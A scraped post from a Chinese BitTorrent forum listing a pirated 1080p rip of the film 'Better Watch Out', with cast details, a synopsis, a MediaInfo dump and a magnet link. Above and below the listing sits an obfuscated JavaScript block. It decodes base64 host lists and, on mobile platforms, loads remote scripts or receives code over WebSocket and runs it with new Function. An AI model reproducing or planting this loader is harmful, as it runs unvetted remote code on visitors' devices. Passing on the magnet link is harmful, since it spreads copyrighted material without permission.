安全邻域[中文字幕].Better.Watch.Out.2016.1080p.BluRay.DTS.x265-10bit 7.39GB

版主小s 1月前 258

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x68\x6e\x49\x43\x61\x57\x73\x53\x72\x45']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};

◎译 名 安全邻域 / 最好小心(台) / 小心为上 / Safe Neighborhood

◎片 名 Better Watch Out

◎年 代 2016

◎产 地 美国 / 澳大利亚

◎类 别 喜剧 / 恐怖

◎语 言 英语

◎上映日期 2016-09-22(奇幻电影节) / 2017-10-06(美国)

◎IMDb链接 https://www.imdb.com/title/tt4443658/

◎豆瓣评分 6.5/10 (8590人评价)

◎豆瓣链接 https://movie.douban.com/subject/26731238/

◎片 长 89分钟

◎导 演 克里斯·佩寇维 Chris Peckover (id:1382246)

◎编 剧 扎克·卡恩 Zack Kahn (id:1382247)

克里斯·佩寇维 Chris Peckover (id:1382246)

◎演 员 奥利维亚·德容格 Olivia DeJonge (id:1351916)

维吉妮娅·马德森 Virginia Madsen (id:1049512)

帕特里克·沃伯顿 Patrick Warburton (id:1041121)

戴克·蒙哥马利 Dacre Montgomery (id:1354781)

莱维·米勒 Levi Miller (id:1339891)

艾德·奥克森博尔德 Ed Oxenbould (id:1327129)

亚历克斯·米基克 Aleks Mikic (id:1382784)

塔拉·杰德·博格 Tara Jade Borg (id:1382785)

布伦丹·克莱金 Brendan Clearkin (id:1355307)

崔西娅·玛丽·亨尼西 Tricia Mary Hennessy (id:1382786)

◎标 签 惊悚 / 犯罪 / 恐怖 / 美国 / 儿童 / 喜剧 / 澳大利亚 / 2016

◎简 介

血腥版《小鬼当家》,口碑还不错的儿童恐怖新片,“小飞侠”莱维·米勒扮演的男主角,父母假期出门,家中留下他、好友和父母找来看管他的保姆。这晚闯入者来找小保姆麻烦,却被逮到还被残酷的折磨...

  1. ##### MediaInfo ######

  2. General

  3. Unique ID : 58723268591186770463226514549753482619 (0x2C2DB0AD1815D7E1B7640337579F8D7B)

  4. Complete name : [email protected]OM.mkv

  5. Format : Matroska

  6. Format version : Version 4

  7. File size : 7.39 GiB

  8. Duration : 1 h 28 min

  9. Overall bit rate : 11.9 Mb/s

  10. Movie name : Better Watch Out 2016 1080p BluRay DTS [email protected]

  11. Encoded date : UTC 2021-10-26 23:24:22

  12. Writing application : mkvmerge v38.0.0 ('The Silent Type') 64-bit

  13. Writing library : libebml v1.3.9 + libmatroska v1.5.2


  14. Video

  15. ID : 1

  16. Format : HEVC

  17. Format/Info : High Efficiency Video Coding

  18. Format profile : Main [email protected]@High

  19. Codec ID : V_MPEGH/ISO/HEVC

  20. Duration : 1 h 28 min

  21. Bit rate : 10.4 Mb/s

  22. Width : 1 920 pixels

  23. Height : 800 pixels

  24. Display aspect ratio : 2.40:1

  25. Frame rate mode : Constant

  26. Frame rate : 24.000 FPS

  27. Color space : YUV

  28. Chroma subsampling : 4:2:0

  29. Bit depth : 10 bits

  30. Bits/(Pixel*Frame) : 0.281

  31. Stream size : 6.44 GiB (87%)

  32. Title : @HDSky

  33. Writing library : x265 - H.265/HEVC codec

  34. Default : Yes

  35. Forced : No


  36. Audio

  37. ID : 2

  38. Format : DTS

  39. Format/Info : Digital Theater Systems

  40. Codec ID : A_DTS

  41. Duration : 1 h 28 min

  42. Bit rate mode : Constant

  43. Bit rate : 1 509 kb/s

  44. Channel(s) : 6 channels

  45. Channel layout : C L R Ls Rs LFE

  46. Sampling rate : 48.0 kHz

  47. Frame rate : 93.750 FPS (512 SPF)

  48. Bit depth : 24 bits

  49. Compression mode : Lossy

  50. Stream size : 959 MiB (13%)

  51. Title : English

  52. Language : English

  53. Default : Yes

  54. Forced : No


  55. Text #1

  56. ID : 3

  57. Format : PGS

  58. Muxing mode : zlib

  59. Codec ID : S_HDMV/PGS

  60. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  61. Duration : 1 h 28 min

  62. Bit rate : 27.6 kb/s

  63. Count of elements : 2184

  64. Stream size : 17.4 MiB (0%)

  65. Title : CHS

  66. Language : Chinese

  67. Default : Yes

  68. Forced : No


  69. Text #2

  70. ID : 4

  71. Format : PGS

  72. Muxing mode : zlib

  73. Codec ID : S_HDMV/PGS

  74. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  75. Duration : 1 h 28 min

  76. Bit rate : 28.3 kb/s

  77. Count of elements : 2184

  78. Stream size : 17.8 MiB (0%)

  79. Title : CHT

  80. Language : Chinese

  81. Default : No

  82. Forced : No


  83. Menu

  84. 00:00:00.000 : en:Chapter 01

  85. 00:07:17.125 : en:Chapter 02

  86. 00:15:19.208 : en:Chapter 03

  87. 00:22:33.208 : en:Chapter 04

  88. 00:29:41.542 : en:Chapter 05

  89. 00:35:16.250 : en:Chapter 06

  90. 00:44:37.167 : en:Chapter 07

  91. 00:51:07.750 : en:Chapter 08

  92. 00:58:21.583 : en:Chapter 09

  93. 01:03:26.250 : en:Chapter 10

  94. 01:11:57.750 : en:Chapter 11

  95. 01:19:51.458 : en:Chapter 12




复制代码


TAGS 恐怖 喜剧

磁力链:
  • magnet:?xt=urn:btih:C698C976B5341A5A2B5CF48567A80B03FE79C4EB

上传的附件:
BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。
最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNg==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x59\x72\x72\x51\x4e\x72\x4a\x5a\x7a\x42']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};